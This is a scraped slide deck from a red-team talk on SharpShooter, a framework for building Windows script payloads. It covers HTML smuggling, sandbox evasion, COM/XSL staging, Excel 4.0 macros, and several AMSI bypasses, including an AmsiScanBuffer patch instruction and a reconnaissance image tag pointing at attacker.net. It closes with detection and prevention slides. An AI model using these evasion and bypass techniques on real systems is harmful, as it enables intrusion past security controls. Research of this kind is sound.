Cracking the Perimeter with SharpShooter Dominic Chell June 2019 - - PowerPoint PPT Presentation

cracking the perimeter with sharpshooter
SMART_READER_LITE
LIVE PREVIEW

Cracking the Perimeter with SharpShooter Dominic Chell June 2019 - - PowerPoint PPT Presentation

Mar 10, 2024 335 likes •806 views

Cracking the Perimeter with SharpShooter Dominic Chell June 2019 # whoami Dominic Chell: Offensive Security @ MDSec Responsible for *BEST, STAR and TIBER services Twitter : @domchell Projects: SharpShooter LyncSniper

slide-1
SLIDE 1

Cracking the Perimeter with SharpShooter

Dominic Chell June 2019

slide-2
SLIDE 2
  • Dominic Chell:
  • Offensive Security @ MDSec
  • Responsible for *BEST, STAR and TIBER services
  • Twitter : @domchell

# whoami

  • Projects:
  • SharpShooter
  • SharpPack
  • Chameleon
  • LyncSniper
  • PowerDNS
slide-3
SLIDE 3
  • Background
  • SharpShooter Overview
  • Reconnaissance
  • Delivery
  • Sandbox Evasion
  • Staging
  • “Free Styling” with

SharpShooter

  • Exploring AMSI
  • Macro Support
  • Tradecraft
  • Detection / Prevention

OUTLINE

slide-4
SLIDE 4
  • Establishing initial access can often be complex
  • Increased focus from defenders on PowerShell attacks
  • Easy to signature both statically and with process spawn

chains

  • AMSI provides engines direct access to memory
  • Rise of sandboxing tech, “Next Gen Anti-Virus”, EDR and EDP
  • Increased difficulties introducing payloads to environments
  • Red teaming is getting harder!

BACKGROUND

slide-5
SLIDE 5
  • Internally developed tool; SharpShooter
  • Successful on a number of adversary simulations
  • Some success in bypassing traditional and “Next Gen”

security controls

OVERVIEW: SharpShooter

slide-6
SLIDE 6

OVERVIEW: SharpShooter

slide-7
SLIDE 7
  • Staged and stageless payload creation framework for Windows

based Scripting file formats:

  • HTML Applications
  • JavaScript
  • VBScript
  • Windows Script Files
  • VBA and Excel4 Macro Support
  • Arbitrary execution of CSharp source
  • Anti-Sandboxing and HTML Smuggling

OVERVIEW: SharpShooter

slide-8
SLIDE 8
  • Script payloads execute DotNet using DotNetToJScript
  • Staged payloads:
  • Arbitrary CSharp source code is retrieved via DNS or web
  • CSharp source code is compiled and executed using

reflection

OVERVIEW: SharpShooter

slide-9
SLIDE 9
  • Targeted reconnaissance provides better chance of

success

  • Payload should be targeted for correct version of

DotNet framework

  • If executing in-process shellcode, it should correspond to

the target’s architecture

  • Alternatively, an x86 process can be spawned and

injected in to

RECONNAISSANCE

slide-10
SLIDE 10
  • Reconnaissance e-mail with image and system profiling

links

  • Embed in e-mail:
  • Monitor web logs for results:

RECONNAISSANCE <img src=“http://attacker.net/logo.png?uid=1234” /> Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Microsoft Outlook 16.0.6366; ms-office; MSOffice 16)

slide-11
SLIDE 11
  • Delivery can leverage the “HTML smuggling” technique

from @buffaloverflow

  • RC4 encrypted file decrypted in the browser using

JavaScript’s WebCrypto APIs

  • navigator.mssaveBlob forces the browser to save the

decrypted blob locally

  • Proxy sees text/html or attachment rather than the

content type of the payload (e.g. text/vbscript)

  • SharpShooter provides two pre-defined template examples

DELIVERY

slide-12
SLIDE 12
  • Attempts to avoid automated analysis, inspired by

CheckPlease:

  • Domain keying
  • Domain member
  • Sandbox artefacts
  • Bad MACs
  • Debugging

SANDBOX EVASION

slide-13
SLIDE 13
  • Obtaining Active Directory name example:

SANDBOX EVASION

slide-14
SLIDE 14
  • Obtaining Active Directory name example:

SANDBOX EVASION

slide-15
SLIDE 15

DEMO: PALO ALTO TRAPS

slide-16
SLIDE 16
  • Shortly after release signatures

began to emerge

  • Defender AMSI signature

detects all DotNetToJScript

  • Proclaimed dead by @subTee

DETECTION STATUS

slide-17
SLIDE 17

DETECTION STATUS

slide-18
SLIDE 18

DETECTION STATUS

slide-19
SLIDE 19

SharpShooter RESURRECTION

slide-20
SLIDE 20
  • Microsoft introduced AMSI in Windows 10
  • Standard interface to provide file, memory and stream

scanning for any application

  • Analysis at the scripting engine therefore access to the

plain, deobfuscated code

  • Supported in PowerShell, Windows Script Host,

JavaScript and VBScript and Office VBA macros

ANTIMALWARE SCAN INTERFACE

slide-21
SLIDE 21

ANTIMALWARE SCAN INTERFACE

slide-22
SLIDE 22

ANTIMALWARE SCAN INTERFACE

slide-23
SLIDE 23
  • Mid-April 2018 @subTee

released “SquiblyTwo” attack

  • Script execution through

Stylesheets using wmic.exe

  • Defender AMSI did not

trigger

ANTIMALWARE SCAN INTERFACE

slide-24
SLIDE 24
  • Updates to SharpShooter to include “COM Staging” and XSL /

SCT generation

  • Several known COM methods allow command execution:
  • Outlook.CreateObject,
  • WScript.Run,
  • Shellbrowserwindow.Document.Application.Run,
  • WMI StartWin32Process
  • Leverage COM to execute wmic.exe or regsvr32.exe on the

command line to perform “Squiblydoo” and “SquiblyTwo” attacks

COM STAGING

slide-25
SLIDE 25

COM STAGING

HTA, JS, VBS COM Interface (Outlook, WScript, WMI etc) wmic.exe / regsvr32.exe Remotely Hosted XSL or SCT

slide-26
SLIDE 26

FREE STYLING WITH SharpShooter

slide-27
SLIDE 27
  • Research in to COM objects supporting XSL processing identified

Microsoft.XMLDOM interface

  • Inline and remotely hosted transformation of XML against a given

stylesheet, providing following benefits:

  • No command line execution,
  • Regsvr32.exe has known IOCs e.g. User-Agent,
  • XSL retrieval via HTTP/HTTPS
  • AMSI not supported in scriptlets; added early 2019
  • Later used by @bohops to bypass WDAC in CVE-2018-8492

FREE STYLING WITH SharpShooter

slide-28
SLIDE 28

FREE STYLING WITH SharpShooter

slide-29
SLIDE 29

DEMO: WINDOWS DEFENDER XSL

slide-30
SLIDE 30
  • @Tal_Liberman discovered an AMSI bypass using the

“AmsiEnable” registry key (HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable)

  • Requires the user to “open” the payload twice:
  • First pass checks the registry to determine if the key is

set and if not set it

  • Second pass opens the payload from the user’s

download folder

AMSI BYPASSES

slide-31
SLIDE 31

AMSI BYPASSES

slide-32
SLIDE 32
  • @tiraniddo discovered a DLL hijacking vulnerability in

AMSI

  • The technique prevents LoadLibrary from loading the

AMSI.dll by convincing it that it’s already loaded

  • The scripting engine is unable to find the AMSI DLL

exports and fails safe

  • Copy wscript.exe to known location with name

amsi.dll and run the script file

AMSI BYPASSES

slide-33
SLIDE 33
  • @Tal_Liberman discovered another

bypass in AMSI by patching the amsi.dll’s exported functions

  • AmsiScanBuffer handles the

buffer that is being scanned

  • Function patched in memory to

return AMSI_RESULT_CLEAN

  • mov eax, 0x80070057; retn

AMSI BYPASSES

slide-34
SLIDE 34

DEMO: DEFENDER AMSI BYPASS

slide-35
SLIDE 35
  • In Feb 2019, SharpShooter added additional support for

VBA and Excel 4.0 macros

  • VBA support introduced using XMLDOM and XSL technique
  • @StanHacked discovered a legacy feature of Office to

execute macros using Excel 4.0

  • Excel 4.0 does not support AMSI and not recognised by

many EDR/EDP solutions

  • SharpShooter generates an SLK file to directly execute

shellcode in Excel

MACRO SUPPORT

slide-36
SLIDE 36

DEMO: MACRO EXECUTION

slide-37
SLIDE 37
  • Default SharpShooter templates do not employ OpSec tradecraft,

stageless template:

  • Allocates memory EXECUTE_READWRITE for shellcode execution
  • Executes shellcode “in process”, e.g. mshta.exe performing C2
  • Spawns from the default parent, e.g. wscript.exe launched

from chrome.exe

  • Indicators discussed in detail by defenders:
  • https://countercept.com/blog/analyzing-sharpshooter-part-1/
  • https://countercept.com/blog/analyzing-sharpshooter-part-2/

TRADECRAFT

slide-38
SLIDE 38
  • Reducing memory indicators is a trivial step:
  • Firstly allocate memory using PAGE_READWRITE
  • Reset the page permissions to PAGE_EXECUTE_READ

using VirtualProtect

TRADECRAFT

slide-39
SLIDE 39
  • Reducing process indicators can be achieved using

injection:

  • Spawn innocuous process e.g. iexplore.exe
  • Inject shellcode using chosen technique, e.g. ALPC,

SetThreadContext, CreateRemoteThread etc.

TRADECRAFT

slide-40
SLIDE 40
  • Parent PID spoofing can be performed using

UpdateProcThreadAttribute

  • CreateProcess using STARTUPINFOEX struct

TRADECRAFT

slide-41
SLIDE 41

DEMO: TRADECRAFT

slide-42
SLIDE 42
  • Staged mode CSharp compilation using CodeDom with

the CompilerParameters.GenerateInMemory = true; parameter

  • Command line logging:
  • csc.exe invocation
  • nslookup.exe for DNS delivery
  • Modifications to AmsiEnable registry key for AMSI

bypasses

DETECTION

slide-43
SLIDE 43
  • Endpoint prevention strategies:
  • Device Guard code integrity policy
  • Application whitelisting, block mshta.exe etc.
  • Modify default handlers for scripting extensions
  • Network:
  • Outbound DNS filtering
  • Monitor for HTML Smuggling, e.g. WebCrypto APIs

PREVENTION

slide-44
SLIDE 44
  • Windows Scripting file formats provide a number of

interesting opportunities for initial access

  • Leveraging COM these can be harnessed for code

execution using scriptlets and execution cradles

  • Creating weaponised tools raises ethical dilemmas,

particularly when observed in the wild

  • Red team research/tooling can however provide a rare
  • pportunity to raise the bar in detection at scale

CONCLUSIONS

slide-45
SLIDE 45
  • SharpShooter available from https://github.com/

mdsecactivebreach/SharpShooter

  • Thanks to the following people:
  • @tiraniddo: DotNetToJScript
  • @Arno0x0x: EmbedInHTML
  • @buffaloverflow: Demiguise
  • @arvanaghi and @ChrisTruncer: CheckPlease
  • @subTee: Squiblydoo/Two
  • @StanHacked: Excel4.0 research

REFERENCES

slide-46
SLIDE 46

QUESTIONS